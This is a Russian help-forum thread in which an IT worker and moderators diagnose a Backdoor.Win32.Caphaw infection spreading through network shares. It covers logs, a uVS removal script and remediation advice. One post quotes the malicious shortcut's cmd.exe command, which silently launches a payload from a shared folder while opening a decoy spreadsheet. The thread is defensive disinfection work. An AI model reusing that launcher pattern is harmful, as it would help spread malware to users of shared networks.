Показано с 1 по 15 из 15.

Не грузится Опера и Хром [Backdoor.Win32.Caphaw.zj ] (заявка № 151306)

  1. #1
    Junior Member Репутация
    Регистрация
    10.12.2013
    Сообщений
    9
    Вес репутации
    11

    Не грузится Опера и Хром [Backdoor.Win32.Caphaw.zj ]

    Появился вирус в сети, основной признак заражения - перестает грузится Хром и Опера. Метод заражения - похоже через сетевые папки, файлы переименовываются в линки, а в линках прописывается заражающее тело. Само заражающее тело я выделил, есть в архиве, могу прислать если нужно (на форум их не рекомендовано выкладывать), но вот что эта падла делает с системой - непонятно, новых процессов вроде как не появляется, однако Хром и Опера не грузится, иногда пытается что-то удалять, не получается, выдает системную ошибку.

    virusinfo_syscure.zip
    hijackthis.log
    virusinfo_syscheck.zip

    Помогите разобраться, плиз!

  2. Реклама
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,268
    Вес репутации
    326
    Уважаемый(ая) BorodaOleg, спасибо за обращение на наш форум!

    Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Moderator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для mrak74
    Регистрация
    03.10.2009
    Адрес
    Москва
    Сообщений
    8,082
    Вес репутации
    443
    Сделайте дополнительный лог Сделайте полный образ автозапуска uVS

    На сетевых папках общий доступ для всех открыт, полный, всем ?
    >> Заблокирована настройка автоматического обновления
    Самостоятельно блокировали ?

  5. #4
    Junior Member Репутация
    Регистрация
    10.12.2013
    Сообщений
    9
    Вес репутации
    11
    Цитата Сообщение от mrak74 Посмотреть сообщение
    Сделайте дополнительный лог Сделайте полный образ автозапуска uVS

    На сетевых папках общий доступ для всех открыт, полный, всем ?
    Самостоятельно блокировали ?
    полный образ : uVS.zip

    во время обработки программа выдала сообщение об ошибке: ошибка.JPG

    На сетевых папках, как правило, полный доступ.
    Автообновление блокировали сами, было пару обновлений, после которого система напрочь ложилась, после того начали предварительно проверять

  6. #5
    Junior Member Репутация
    Регистрация
    10.12.2013
    Сообщений
    9
    Вес репутации
    11
    uVS.zip

    Во время выполнения выдала ошибку: ошибка.JPG

    - - - Добавлено - - -

    Цитата Сообщение от mrak74 Посмотреть сообщение
    Сделайте дополнительный лог Сделайте полный образ автозапуска uVS

    На сетевых папках общий доступ для всех открыт, полный, всем ?
    Самостоятельно блокировали ?
    На сетевых папках, как правило полный доступ
    Автообновление блокировали самостоятельно.

  7. #6
    Moderator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для mrak74
    Регистрация
    03.10.2009
    Адрес
    Москва
    Сообщений
    8,082
    Вес репутации
    443
    Об ошибке, похоже что это от программы КонсультантПлюс - считайте это нормальным событием.

    Заражение происходит похоже с другого компьютера. По нему создайте отдельную тему.

    По поводу ошибок Хром и Опера, давайте посмотрим их через лог MiniToolBox

  8. #7
    Junior Member Репутация
    Регистрация
    10.12.2013
    Сообщений
    9
    Вес репутации
    11
    Результаты скана MiniToolBox в приложении

    Вирус распространяется с другого компьютера, это так, с какого не совсем понятно. Тело вируса, которое заряжает компьютер я выявил, и с него уже сознательно заражал этот. После заражения, как основной признак перестали запускаться Опера и Хром.
    Вложения Вложения

  9. #8
    Moderator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для mrak74
    Регистрация
    03.10.2009
    Адрес
    Москва
    Сообщений
    8,082
    Вес репутации
    443
    Цитата Сообщение от BorodaOleg Посмотреть сообщение
    Само заражающее тело я выделил, есть в архиве
    Запакуйте вирус в архив с паролем virus и загрузите по красной ссылке Прислать запрошенный карантин вверху темы.

    Скачайте и установите User Profile Hive Cleanup Service

    В логе очень много ошибок связанных с Active Directory, либо проблема в контроллере домена, либо конкретно в этом компьютере. С этой проблемой к админам.

    Percentage of memory in use: 70%
    Total physical RAM: 247.48 MB
    Available physical RAM: 73.29 MB
    Свободно 73.29 MB памяти. Мало. Очень мало для нормального функционирования системы.

    После получения карантина, решим как отловить вирус в вашей сети. Физический доступ к компьютеру на котором находится сетевая "расшаренная" папка где появляется вирус, имеется ?

  10. #9
    Junior Member Репутация
    Регистрация
    10.12.2013
    Сообщений
    9
    Вес репутации
    11
    Тело сбросил в карантин, там 5 файлов, инициируется файл uxgldad.ajwx, висит в процессах секунд 30, потом сбрасывается. На разных зараженных компьютерах имена файлов бывают разные.
    По остальному допишу завтра.
    Последний раз редактировалось BorodaOleg; 12.12.2013 в 10:24. Причина: дописать важную информацию

  11. #10
    Junior Member Репутация
    Регистрация
    10.12.2013
    Сообщений
    9
    Вес репутации
    11
    Скачайте и установите User Profile Hive Cleanup Service - скачал, установил. Ничего не дало.
    В логе очень много ошибок связанных с Active Directory - да, домен был в процессе переноса с WS2003 на WS2008, затем его откатили обратно на WS2003, короче кое как изолентой смотанный пока работает.
    Тот компьютер, с которого я писал логи специально собирал из хлама с целью имитировать заражение вирусом, чтобы отследить что в нем меняется. Вообщем ничего не понял, после чего уже стал обращаться к вам.
    У нас в сети около 150 компьютеров, доступ ко всем имеется, другое дело, что не совсем понятно, с которого обращается вирус. Зараженные папки же могут появится где угодно.
    Тут еще небольшое уточнение, переименовываются в линки вложенные папки и файлы *.doc, *.xls и *.exe.
    Jpeg, mp3, avi, - не трогает.

    - - - Добавлено - - -

    C:\WINDOWS\system32\cmd.exe /C start /b "" "cmd.exe" /C if exist "\\BELKO-YV\почта\uxGLDAd.AjWX" start /b "" "\\BELKO-YV\почта\uxGLDAd.AjWX" && start /b "" "\\BELKO-YV\почта\Движение 11.xls"

    Забыл добавить, вот строчка в линке, по которому вызывается вирус.

  12. #11
    Junior Member Репутация
    Регистрация
    10.12.2013
    Сообщений
    9
    Вес репутации
    11
    http://rghost.ru/50932050

    полный образ автозапуска uVS (в безопасном режиме)

  13. #12
    Moderator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для mrak74
    Регистрация
    03.10.2009
    Адрес
    Москва
    Сообщений
    8,082
    Вес репутации
    443
    Вирус от 2012 года описание.

    Вы самостоятельно обнаружили компьютер, вызывающий заражение, имя компьютера BELKO-YV.

    Групповой политикой отключить бы автозапуск, пример http://support.microsoft.com/kb/2328787/ru

    Через wsus если имеется распространить требуемые обновления, в логах wsus они прекрасно видны.

    Через консоль управления корпоративным антивирусом, если имеется запустить задачу сканирования на всех компьютерах для полной проверки.

    - - - Добавлено - - -

    Выполните скрипт в uVS Как выполнить скрипт в uVS
    Код:
    ;uVS v3.80.1 script [http://dsrt.dyndns.org]
    ;Target OS: NTv5.1
    
    zoo %SystemDrive%\DOCUMENTS AND SETTINGS\LUSER\APPLICATION DATA\MICROSOFT\CRYPTNETURLCACHE\METADATA\EXTRAC32.EXE
    delall %SystemDrive%\DOCUMENTS AND SETTINGS\LUSER\APPLICATION DATA\MICROSOFT\CRYPTNETURLCACHE\METADATA\EXTRAC32.EXE
    restart
    Пришлите карантин из папки ZOO предварительно заархивировав его с паролем virus.

    Сделайте новый лог uVS в безопасном режиме.

    Отдельное Спасибо santy, за помощь в теме.

    - - - Добавлено - - -

    +
    Код:
    C:\Documents and Settings\luser\Application Data\Microsoft\Office\RTLCPL.EXE
    Пришлите в карантин согласно Приложения 2 правил по красной ссылке Прислать запрошенный карантин вверху темы

    - - - Добавлено - - -

    information

    Уведомление

    Новые логи uVS производить только в Безопасном режиме, не загружать компьютер в обычный режим до окончания лечения или пока не разрешит хэлпер.


    Особенность вируса не позволяет пролечить его другим способом. По вопросам лечения с помощью uVS, можете обращаться к хэлперам: Vvvyg, mike 1, mrak74.

  14. #13
    Junior Member Репутация
    Регистрация
    10.12.2013
    Сообщений
    9
    Вес репутации
    11
    К сожалению, тестовый компьютер сдох окончательно, система не загружается, сразу идет на ресет. Скорее всего дело в железе, я его из хлама собирал Так что ни попытаться пролечить, ни получить отчет через uVS не могу
    Успел только обратить внимание, что по вышеуказанному адресу физически, после загрузки системы, такого файла не лежит, хотя в реестре ссылки на него были.
    Сейчас пытаюсь найти еще один блок со схожими параметрами, может с ним что-нибудь получиться
    В любом случае, спасибо за помощь.

  15. #14
    Moderator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для mrak74
    Регистрация
    03.10.2009
    Адрес
    Москва
    Сообщений
    8,082
    Вес репутации
    443
    Можно подключить жесткий диск со сдохшего компа к исправному даже по USB при наличии внешнего контейнера под HDD или напрямую к свободным контактам в корпусе и снять лог по аналогии с Сделайте образ автозапуска uVS с Live CD, а именно
    Если Вы все сделали верно, должно появиться окно программы uVS. Щёлкните "Выбрать каталог Windows", откроется проводник с выбором папки системы, укажите папку "С:\Windows" (у вас может быть папка Windows.0 или иная, главное чтобы она содержала Вашу зараженную ОС);
    Главное выбрать правильно каталог Windows.

  16. #15
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    47,551
    Вес репутации
    942

    Итог лечения

    Статистика проведенного лечения:
    • Получено карантинов: 1
    • Обработано файлов: 5
    • В ходе лечения обнаружены вредоносные программы:
      1. \uxgldad.ajwx - Backdoor.Win32.Caphaw.zj ( BitDefender: Trojan.GenericKD.1449599, AVAST4: Win32:Malware-gen )


  • Уважаемый(ая) BorodaOleg, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:


    Надеемся больше никогда не увидеть ваш компьютер зараженным!

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.
  • Присоединяйтесь к нам в соцсетях!

    Мы делаем все возможное, чтобы помогать людям в защите и лечении компьютеров.

    Похожие темы

    1. Ответов: 44
      Последнее сообщение: 02.06.2013, 19:21
    2. Ответов: 9
      Последнее сообщение: 10.09.2012, 09:20
    3. Гугл хром не грузится, белый экран
      От Beirut в разделе Помогите!
      Ответов: 19
      Последнее сообщение: 26.02.2012, 00:23
    4. Опера и Хром перестали грузить сайты.
      От demir в разделе Помогите!
      Ответов: 5
      Последнее сообщение: 29.08.2011, 22:06
    5. не работает гугл хром и опера (заявка №99475)
      От CyberHelper в разделе Отчеты сервиса лечения VirusInfo
      Ответов: 1
      Последнее сообщение: 16.07.2011, 03:01

    Метки для этой темы

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01012 seconds with 22 queries